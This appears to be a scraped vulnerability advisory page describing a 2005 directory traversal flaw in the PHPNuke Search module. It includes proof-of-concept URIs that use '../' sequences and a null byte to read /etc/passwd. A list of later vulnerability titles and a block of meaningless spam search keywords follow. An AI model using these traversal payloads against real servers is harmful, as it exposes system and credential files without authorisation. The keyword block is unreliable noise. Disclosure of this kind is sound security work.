exploits , vulnerabilities , articles , PHPNuke Modules.PHP Search Module Remote Directory Traversal Vulnerability

Title	PHPNuke Modules.PHP Search Module Remote Directory Traversal Vulnerability
Published	2005-10-19-12:00AM
Updated	2005-10-19-04:58PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	sp3x@securityreason.com is credited with the discovery of this vulnerability.
Vulnerable	PHPNUke PHPNuke 7.9 PHPNUke PHPNuke 7.8
Not Vulnerable
Code	An exploit is not required. Proof of concept URI have been provided: http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../../../../../../../../../etc/passwd%00 http://www.example.com/[nuke_dir]/modules.php?name=Search&file=../Forums/viewtopic&phpEx=../../../. ./../../etc/passwd
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-17 iDevSpot iSupport Multiple Cross Site Scripting Vulnerabilities
2009-12-17 GNU Automake Insecure Directory Permissions Vulnerability
2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
2009-12-17 Drupal Sections Module HTML Injection Vulnerability
2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 19:36:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Wwwpinkwor mhw518.cn www.image. TRISA SEXS dmoz.im Photokorn logo1_.exe soong SREYASEX.C dmoz.im /claroline TRISA SEXS news for c Sexey.Foto sex videos www.qdbole www.lzvw.c wwwsexdc00 www.abcsw. 200 /compo CMS is Fre m...Ffx29i JG???JTJG cicso com www.jl.gov exploit mu Porn video lo335l maxcpm.inf mambo Remo shop login SNMP explo Saxy girl Www.sexpho bolewod.se www.ewin88 smbd t951t 200 /compo hasharia SSH-2.0-Op php-nuke 2 news searc bedava por www.huangg collge gir nokia n73 news for c www.lexsen www.89six.